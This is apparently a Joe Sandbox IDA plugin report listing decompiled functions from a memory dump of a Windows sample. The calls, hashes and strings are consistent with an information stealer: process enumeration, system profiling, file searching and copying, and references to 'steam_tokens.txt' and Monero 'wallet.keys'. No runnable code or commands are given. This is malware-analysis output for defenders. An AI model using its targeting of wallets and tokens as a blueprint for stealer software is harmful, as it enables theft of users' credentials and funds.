Part of subcall function 00358680: Process32First.KERNEL32(?,00000128), ref: 003586DE
Part of subcall function 00358680: Process32Next.KERNEL32(?,00000128), ref: 003586F3
Part of subcall function 00358680: CloseHandle.KERNEL32(?), ref: 00358761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0035265B

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: 023d7f820eb2b12c13dd62c5c1f9959d0ffcc990979e88494f2834ed26efda06
Instruction ID: 6bdad8c4ad49889265d4405d95590bc673ddc27b84fd3841ead08515c549fb25
Opcode Fuzzy Hash: 023d7f820eb2b12c13dd62c5c1f9959d0ffcc990979e88494f2834ed26efda06
Instruction Fuzzy Hash: 65725D72C10518AADB1BFB90DC92DEE7778AF14301F508399B9166A071EF302B4DEB65

Function 00346D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ec8d088117c0b30f3468f66bed42b428fe7ae1fdc6524dd88b1dd1a7a4f61dd
Instruction ID: 83631b986f9f101330e9e36adc03d604d58f659e147c229bb6d2d8323b1e299e
Opcode Fuzzy Hash: 3ec8d088117c0b30f3468f66bed42b428fe7ae1fdc6524dd88b1dd1a7a4f61dd
Instruction Fuzzy Hash: 016139B4D00218DFCB15CF94E986BEEB7F4BB05304F108598E4196B281D735AE98DF92

Function 00355100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A820: lstrlen.KERNEL32(00344F05,?,?,00344F05,00360DDE), ref: 0035A82B
Part of subcall function 0035A820: lstrcpy.KERNEL32(00360DDE,00000000), ref: 0035A885

lstrlen.KERNEL32(00000000,00000000,00360ACA), ref: 0035512A

Strings

steam_tokens.txt, xrefs: 0035513F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 7abb232470d16769d41ceffec118baff8329db2ce826f8fbd6c5f25ba8be7e51
Instruction ID: 42d6e36d9537aa32477f519f1dfed2a8f342b2e9372a5083582e250c71659e68
Opcode Fuzzy Hash: 7abb232470d16769d41ceffec118baff8329db2ce826f8fbd6c5f25ba8be7e51
Instruction Fuzzy Hash: E6F01D7191050866DB06FBB0EC57DED773CAF54301F404258BC576A0A2EF24660DE7A3

Function 00357ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00360E2C), ref: 00357F00
wsprintfA.USER32 ref: 00357F16

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 910abcb01c65ef834589d43cdeecabeb4c4ead17bc50a569b2c7f96afbd7b6ea
Instruction ID: 9f338608ca0fec15767ffa8738bc78dba2452831ad57b09e43f083ff4d36cc74
Opcode Fuzzy Hash: 910abcb01c65ef834589d43cdeecabeb4c4ead17bc50a569b2c7f96afbd7b6ea
Instruction Fuzzy Hash: 8CF096B1904208EBD714CF85DC45FEAF7BCFB44714F00466AF915A2680D77559448BD1

Function 0034B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

lstrlen.KERNEL32(00000000), ref: 0034B9C2
lstrlen.KERNEL32(00000000), ref: 0034B9D6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d68b2c8c7926d4bb8455da1e4cef438433d3015030a80203bb5c845cf289aa4d
Instruction ID: c739b737cd05e270cb50e45db918b5cde7c11d7da5745abce1eca77af1d91fe0
Opcode Fuzzy Hash: d68b2c8c7926d4bb8455da1e4cef438433d3015030a80203bb5c845cf289aa4d
Instruction Fuzzy Hash: 13E1E0729105189BDB16EBA0CC92DEE7778BF54301F404259F9077A0B1EF346A4DEBA2

Function 0034AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrlen.KERNEL32(00000000), ref: 0034B16A
lstrlen.KERNEL32(00000000), ref: 0034B17E

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 30bb7d31db5d099b0807363b0f02fbc912c3c6c3c47eb1fba3dce051d479e50d
Instruction ID: 5df8b9c441167b6c7447e07fdb22686776e5d0280ae22267670604e0f867fabf
Opcode Fuzzy Hash: 30bb7d31db5d099b0807363b0f02fbc912c3c6c3c47eb1fba3dce051d479e50d
Instruction Fuzzy Hash: 189132719105189BDF06EBA0DC52DEE7778BF14301F504259F907AA0B1EF346A0DEBA2

Function 0034B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

lstrlen.KERNEL32(00000000), ref: 0034B42E
lstrlen.KERNEL32(00000000), ref: 0034B442

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: c3d3fca99726893631bcb733bd2fae8ffc97b85aa40b39b5e29f466c9126e466
Instruction ID: c1699efe2cd4518beada79bed2955acfaef7b81653e351a0ab683d02f281acf8
Opcode Fuzzy Hash: c3d3fca99726893631bcb733bd2fae8ffc97b85aa40b39b5e29f466c9126e466
Instruction Fuzzy Hash: 2F7120719105189BDB06FBA0DC96DEE7778BF54301F404619F903AA1A1EF346A0DEBA2

Function 00354BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354BEA
lstrcat.KERNEL32(?,0127DAF0), ref: 00354C08

Part of subcall function 00354910: wsprintfA.USER32 ref: 0035492C
Part of subcall function 00354910: FindFirstFileA.KERNEL32(?,?), ref: 00354943

Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FDC), ref: 00354971
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,00360FE0), ref: 00354987
Part of subcall function 00354910: FindNextFileA.KERNEL32(000000FF,?), ref: 00354B7D
Part of subcall function 00354910: FindClose.KERNEL32(000000FF), ref: 00354B92

Part of subcall function 00354910: wsprintfA.USER32 ref: 003549B0
Part of subcall function 00354910: StrCmpCA.SHLWAPI(?,003608D2), ref: 003549C5
Part of subcall function 00354910: wsprintfA.USER32 ref: 003549E2
Part of subcall function 00354910: PathMatchSpecA.SHLWAPI(?,?), ref: 00354A1E
Part of subcall function 00354910: lstrcat.KERNEL32(?,0127E7C8), ref: 00354A4A
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FF8), ref: 00354A5C
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A70
Part of subcall function 00354910: lstrcat.KERNEL32(?,00360FFC), ref: 00354A82
Part of subcall function 00354910: lstrcat.KERNEL32(?,?), ref: 00354A96
Part of subcall function 00354910: CopyFileA.KERNEL32(?,?,00000001), ref: 00354AAC
Part of subcall function 00354910: DeleteFileA.KERNEL32(?), ref: 00354B31

Part of subcall function 00354910: wsprintfA.USER32 ref: 00354A07

Memory Dump Source

